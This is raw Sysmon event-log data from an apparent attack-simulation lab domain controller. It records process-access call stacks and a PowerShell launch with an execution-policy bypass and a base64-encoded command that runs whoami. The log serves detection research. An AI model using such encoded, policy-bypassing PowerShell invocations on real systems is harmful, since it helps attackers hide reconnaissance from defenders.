13:53:58.439{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003033Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.439{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003032Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.439{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003031Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.439{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8576-5FCF-8D00-000000009101}5016C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003030Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.439{10ACEC4A-8576-5FCF-8C00-000000009101}49205012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8576-5FCF-8D00-000000009101}5016C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c23ccecb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c186dad5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c186d7a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c231f08b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c182e33c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c188c80b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c186fe70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c186fe70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c186fd01|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c1861c86|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c186e1b9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c186ddac|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c186dad5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c186d7a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c231f08b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c1854607|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c1853bd7 154100x80000000000000003029Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.449{10ACEC4A-8576-5FCF-8D00-000000009101}5016C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8576-5FCF-EBC9-050000000000}0x5c9eb0HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{10ACEC4A-8576-5FCF-8C00-000000009101}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000003028Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.392{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8576-5FCF-8C00-000000009101}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003027Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.392{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8576-5FCF-8C00-000000009101}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003026Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.346{10ACEC4A-8576-5FCF-8C00-000000009101}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ha2awvcq.u4c.ps12020-12-08 13:53:58.346 10341000x80000000000000003025Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.330{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8576-5FCF-8C00-000000009101}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003024Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-8576-5FCF-8A00-000000009101}48404860C:\Windows\system32\conhost.exe{10ACEC4A-8576-5FCF-8C00-000000009101}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003023Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003022Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003021Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003020Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003019Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003018Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003017Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003016Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003015Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003014Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8576-5FCF-8C00-000000009101}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003013Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003012Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003011Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-8576-5FCF-8B00-000000009101}49044908C:\Windows\system32\cmd.exe{10ACEC4A-8576-5FCF-8C00-000000009101}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003010Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.318{10ACEC4A-8576-5FCF-8C00-000000009101}4920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8576-5FCF-EBC9-050000000000}0x5c9eb0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8576-5FCF-8B00-000000009101}4904C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C 